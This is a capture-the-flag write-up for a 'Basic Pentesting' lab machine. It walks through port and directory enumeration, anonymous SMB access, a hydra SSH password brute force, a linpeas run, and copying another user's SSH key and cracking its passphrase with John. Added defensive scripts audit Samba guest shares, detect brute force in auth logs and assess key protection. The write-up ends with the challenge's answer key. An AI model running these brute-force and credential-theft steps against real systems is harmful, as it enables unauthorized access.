Basic Pentesting
This is a machine that allows you to practise web app hacking and privilege escalation
Solution
Enumeration
nmap -sV -T4 10.49.181.127
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
# 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
# 139/tcp open netbios-ssn Samba smbd 4.6.2
# 445/tcp open netbios-ssn Samba smbd 4.6.2
# 8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
# 8080/tcp open http Apache Tomcat 9.0.7
gobuster dir -u http://10.49.181.127/ -w /usr/share/wordlists/dirb/common.txt
# /development (Status: 301) [Size: 320] [--> http://10.49.181.127/development/]
# /index.html (Status: 200) [Size: 158]
# /server-status (Status: 403) [Size: 278]
# Progress: 4614 / 4615 (99.98%)

Web App Testing
cat dev.txt
# 2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
# to host that on this server too. Haven't made any real web apps yet, but I have tried that example
# you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
# using version 2.5.12, because other versions were giving me trouble. -K
# 2018-04-22: SMB has been configured. -K
# 2018-04-21: I got Apache set up. Will put in our content later. -J
cat j.txt
# For J:
# I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
# and I was able to crack your hash really easily. You know our password policy, so please follow
# it? Change that password ASAP.
# -K

SMB Access
smbclient -L //10.49.181.127
# Password for [WORKGROUP\root]:
# Sharename Type Comment
# --------- ---- -------
# Anonymous Disk
# IPC$ IPC IPC Service (Samba Server 4.15.13-Ubuntu)
# SMB1 disabled -- no workgroup available
smbclient //10.49.181.127/Anonymous -N
smb: \> ls
# staff.txt
smb: \> get staff.txt
smb: \> exit
cat staff.txt
# Announcement to staff:
# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)
# -Kay
From all of this information we obtain two usernames: Kay and Jan.
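The anonymous share listed by smbclient above is a configuration choice, not a bug, so the defender's check is an audit of smb.conf. The script below is an added example for this writeup (not from the original) that parses an smb.conf and flags every share reachable without credentials, plus the global `map to guest` setting that turns rejected logins into guest sessions. The two configurations are constructed samples, not the target's real file.

```python
"""Audit a Samba smb.conf for shares that allow anonymous (guest) access.

Added example for this writeup, not part of the original. The two configs
below are constructed samples, not the target's real smb.conf.
"""
from typing import Dict, List

# smb.conf accepts several synonyms for the same option; normalise them.
SYNONYMS = {"public": "guest ok", "browsable": "browseable", "writeable": "writable"}
TRUE_VALUES = {"yes", "true", "1"}

# Constructed sample: the kind of config that produces an "Anonymous" share in smbclient -L.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User
   server min protocol = SMB2

[Anonymous]
   path = /samba/anonymous
   browseable = yes
   read only = no
   guest ok = yes

[staff]
   path = /samba/staff
   valid users = @staff
   guest ok = no
"""

# Constructed sample: same server with guest access removed.
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2
   server min protocol = SMB3

[staff]
   path = /samba/staff
   valid users = @staff
   guest ok = no
   read only = no
"""


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style parser: {section: {option: value}}, names lower-cased."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank lines and comments
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = key.strip().lower()
        sections[current][SYNONYMS.get(key, key)] = value.strip()
    return sections


def _is_true(value: str) -> bool:
    return value.strip().lower() in TRUE_VALUES


def _is_writable(share: Dict[str, str]) -> bool:
    if "writable" in share:
        return _is_true(share["writable"])
    if "read only" in share:
        return not _is_true(share["read only"])
    return False                                  # Samba default is read only = yes


def audit_smb_conf(text: str) -> List[str]:
    """Return one finding per setting that exposes data to unauthenticated clients."""
    sections = parse_smb_conf(text)
    findings: List[str] = []
    map_to_guest = sections.get("global", {}).get("map to guest", "Never")
    if map_to_guest.lower() != "never":
        findings.append(f"[global] map to guest = {map_to_guest}: rejected logins become guest sessions")
    for name, share in sections.items():
        if name == "global" or not _is_true(share.get("guest ok", "no")):
            continue
        access = "read/write" if _is_writable(share) else "read-only"
        findings.append(f"[{name}] guest ok = yes: anonymous {access} access to {share.get('path', '?')}")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_smb_conf(conf) or ["no findings"])
```

On a live server the same check can be made against the effective configuration with `testparm -s`, which expands defaults and synonyms before the output is fed to the parser.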
Crack SSH Password for Jan
hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.49.181.127 ssh
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 64 10.49.181.127 ssh
# [22][ssh] host: 10.49.181.127 login: jan password: armando

Access SSH as Jan
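The hydra run above, and the login that follows it, leave a very recognisable trace in the target's `/var/log/auth.log`: a burst of `Failed password` lines from one source address, then an `Accepted password` from the same address. The detector below is an added example for this writeup (not from the original) that applies a per-source sliding window to sshd log lines and raises two alerts: the burst itself, and a success that arrives while the burst is still in the window, which is the signal that a credential was guessed rather than mistyped. The log lines and source addresses are constructed.

```python
"""Detect an SSH password brute force, and the login that follows it, in sshd log lines.

Added example for this writeup, not part of the original. The log lines are
constructed to resemble what the hydra run above leaves in /var/log/auth.log;
the hostname and source addresses are invented.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List, Set

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: six failures for jan from one address, a success from the same
# address, plus unrelated traffic that must not trigger an alert.
SAMPLE_AUTH_LOG = [
    "Jan 12 10:15:01 target sshd[1201]: Failed password for jan from 10.49.181.5 port 52310 ssh2",
    "Jan 12 10:15:01 target sshd[1203]: Failed password for jan from 10.49.181.5 port 52311 ssh2",
    "Jan 12 10:15:02 target sshd[1205]: Failed password for invalid user admin from 10.49.181.9 port 41002 ssh2",
    "Jan 12 10:15:02 target sshd[1207]: Failed password for jan from 10.49.181.5 port 52312 ssh2",
    "Jan 12 10:15:03 target sshd[1209]: Failed password for jan from 10.49.181.5 port 52313 ssh2",
    "Jan 12 10:15:03 target sshd[1211]: Accepted password for kay from 10.49.181.20 port 60110 ssh2",
    "Jan 12 10:15:04 target sshd[1213]: Failed password for jan from 10.49.181.5 port 52314 ssh2",
    "Jan 12 10:15:04 target sshd[1215]: Failed password for jan from 10.49.181.5 port 52315 ssh2",
    "Jan 12 10:15:06 target sshd[1217]: Accepted password for jan from 10.49.181.5 port 52400 ssh2",
]


def _parse_ts(ts: str, year: int = 2024) -> datetime:
    # syslog timestamps carry no year; assume one so time deltas can be computed
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(lines: Iterable[str], threshold: int = 5, window_s: int = 60) -> List[str]:
    """Return alerts for failure bursts per source IP and for successes that follow a burst."""
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)   # recent failure times per IP
    burst_alerted: Set[str] = set()                              # IPs already reported for this burst
    alerts: List[str] = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        t, ip, user = _parse_ts(m["ts"]), m["ip"], m["user"]
        recent = failures[ip]
        while recent and (t - recent[0]).total_seconds() > window_s:   # expire old failures
            recent.popleft()
        if not recent:
            burst_alerted.discard(ip)
        if m["result"] == "Failed":
            recent.append(t)
            if len(recent) >= threshold and ip not in burst_alerted:
                burst_alerted.add(ip)
                alerts.append(f"{ip}: {len(recent)} failed logins within {window_s}s (brute force)")
        else:
            if len(recent) >= threshold:
                alerts.append(f"{ip}: successful login as {user} after {len(recent)} recent failures "
                              "(credential likely guessed)")
            recent.clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_ssh_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The second alert is the one worth paging on: a burst alone is background noise on any internet-facing host, but a burst followed by success from the same address means the password is now known to someone else and the account needs a reset and a session review.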
ssh jan@10.49.181.127
# pass: armando

Privilege Escalation
Install linpeas
wget https://github.com/peass-ng/PEASS-ng/releases/download/20260101-f70f6a79/linpeas.sh
scp linpeas.sh jan@10.49.181.127:/tmp
# on target
cd /tmp
chmod +x linpeas.sh
./linpeas.sh
# ══╣ Possible private SSH keys were found!
# /home/kay/.ssh/id_rsa

From the linpeas output we obtain the SSH private key of user kay.
scp jan@10.49.181.127:/home/kay/.ssh/id_rsa .
chmod 600 id_rsa
ssh -i id_rsa kay@10.49.181.127
# Enter passphrase for key 'id_rsa':

It turns out the private key is protected with a passphrase; we can use John the Ripper to recover it.
cat id_rsa
# -----BEGIN RSA PRIVATE KEY-----
# Proc-Type: 4,ENCRYPTED
# DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
# IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
# o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
# XRvjw/HRiGcXPY8B7nsA1eiPYrPZHIH3QOFIYlSPMYv79RC65i6frkDSvxXzbdfX
# AkAN+3T5FU49AEVKBJtZnLTEBw31mxjv0lLXAqIaX5QfeXMacIQOUWCHATlpVXmN
# lG4BaG7cVXs1AmPieflx7uN4RuB9NZS4Zp0lplbCb4UEawX0Tt+VKd6kzh+Bk0aU
locate ssh2john
/opt/john/ssh2john.py
/opt/john/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=ssh id_rsa.hash
# beeswax (id_rsa)

Once we have the passphrase we can log in as user kay.
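The key above is in the legacy PEM format (the `Proc-Type` and `DEK-Info` headers shown by `cat id_rsa`), in which OpenSSL derives the encryption key from the passphrase with a single MD5 pass, so a wordlist run recovers a weak passphrase in seconds; the current OpenSSH key format uses bcrypt with a configurable round count. The script below is an added example for this writeup (not from the original) that reads only the headers of a private key file and reports how, or whether, it is protected, so that unencrypted and legacy-encrypted keys can be found and rotated. The PEM sample reuses just the header lines from the output above with a placeholder body, and `make_openssh_sample()` builds synthetic OpenSSH-format headers that contain no key material.

```python
"""Report how an SSH private key file is protected, so weakly protected keys can be rotated.

Added example for this writeup, not part of the original. The legacy PEM sample
reuses only the header lines shown above with a placeholder body; the OpenSSH
format samples are synthetic headers built by make_openssh_sample() and contain
no key material.
"""
import base64
import struct
from typing import Any, Dict, Optional, Tuple

OPENSSH_MAGIC = b"openssh-key-v1\x00"

# Constructed sample: header lines from the cat id_rsa output above, body replaced.
LEGACY_PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75

AAAAplaceholderbodynotrealkeymaterial
-----END RSA PRIVATE KEY-----"""

# Constructed sample: a legacy PEM key saved without any passphrase.
UNENCRYPTED_PEM_SAMPLE = """-----BEGIN RSA PRIVATE KEY-----
AAAAplaceholderbodynotrealkeymaterial
-----END RSA PRIVATE KEY-----"""


def _pack_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def _read_string(buf: bytes, off: int) -> Tuple[bytes, int]:
    (length,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    return buf[off:off + length], off + length


def make_openssh_sample(cipher: str, kdf: str, rounds: int = 16) -> str:
    """Constructed 'BEGIN OPENSSH PRIVATE KEY' text with only the header fields filled in."""
    kdfopts = (_pack_string(b"\x00" * 16) + struct.pack(">I", rounds)) if kdf == "bcrypt" else b""
    blob = OPENSSH_MAGIC + _pack_string(cipher.encode()) + _pack_string(kdf.encode()) + _pack_string(kdfopts)
    blob += struct.pack(">I", 1)           # nkeys; key sections omitted in this synthetic sample
    body = base64.b64encode(blob).decode()
    lines = [body[i:i + 70] for i in range(0, len(body), 70)]
    return "\n".join(["-----BEGIN OPENSSH PRIVATE KEY-----", *lines, "-----END OPENSSH PRIVATE KEY-----"])


def inspect_private_key(text: str) -> Dict[str, Any]:
    """Parse only the protection metadata of a private key file."""
    lines = [line.strip() for line in text.strip().splitlines()]
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("bad openssh-key-v1 magic")
        off = len(OPENSSH_MAGIC)
        cipher, off = _read_string(blob, off)
        kdf, off = _read_string(blob, off)
        kdfopts, off = _read_string(blob, off)
        rounds: Optional[int] = None
        if kdf == b"bcrypt":                   # kdfoptions = string salt, uint32 rounds
            _salt, o = _read_string(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "kdf_rounds": rounds}
    if header == "-----BEGIN ENCRYPTED PRIVATE KEY-----":   # PKCS#8; parameters live inside the DER
        return {"format": "pkcs8", "encrypted": True, "cipher": "PBES2 (inside DER)",
                "kdf": "PBKDF2 (inside DER)", "kdf_rounds": None}
    if header.startswith("-----BEGIN ") and header.endswith("PRIVATE KEY-----"):
        # Legacy PEM: encryption is signalled by RFC 1421 headers before the base64 body
        pem_headers: Dict[str, str] = {}
        for line in lines[1:]:
            if ":" not in line:
                break
            key, value = line.split(":", 1)
            pem_headers[key.strip()] = value.strip()
        encrypted = pem_headers.get("Proc-Type", "").endswith("ENCRYPTED")
        cipher = pem_headers.get("DEK-Info", "unknown").split(",")[0] if encrypted else "none"
        return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "EVP_BytesToKey(MD5, 1 iteration)" if encrypted else "none",
                "kdf_rounds": 1 if encrypted else None}
    raise ValueError("unrecognised private key file")


def assess_key(info: Dict[str, Any], min_rounds: int = 16) -> str:
    if not info["encrypted"]:
        return "FAIL: private key is stored without a passphrase"
    if info["format"] == "pem":
        return "WEAK: legacy PEM encryption stretches the passphrase with one MD5 pass; re-encrypt with ssh-keygen -p -o -a 100"
    if info["kdf"] == "bcrypt" and info["kdf_rounds"] < min_rounds:
        return f"WEAK: bcrypt rounds {info['kdf_rounds']} below {min_rounds}"
    return "OK"


if __name__ == "__main__":
    for label, sample in (("legacy", LEGACY_PEM_SAMPLE), ("plain", UNENCRYPTED_PEM_SAMPLE),
                          ("openssh", make_openssh_sample("aes256-ctr", "bcrypt", 100))):
        print(label, assess_key(inspect_private_key(sample)))
```

Run over every `id_*` file under the home directories, the script turns the linpeas finding into an inventory. Note that a strong passphrase does not fix the other problem shown above, which is that jan could read kay's key file at all; `~/.ssh` should be mode 700 and the key 600, as the `chmod 600 id_rsa` step on the attacking side reminds us.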
ssh -i id_rsa kay@10.49.181.127
# passphrase: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Answer
Web App Testing and Privilege Escalation
- What is the name of the hidden directory on the web server (enter name without /)?
development
- What is the username?
jan
- What is the password?
armando
- What service do you use to access the server (answer in abbreviation in all caps)?
SSH
- What is the name of the other user you found (all lower case)?
kay
- What is the final password you obtain?
heresareallystrongpasswordthatfollowsthepasswordpolicy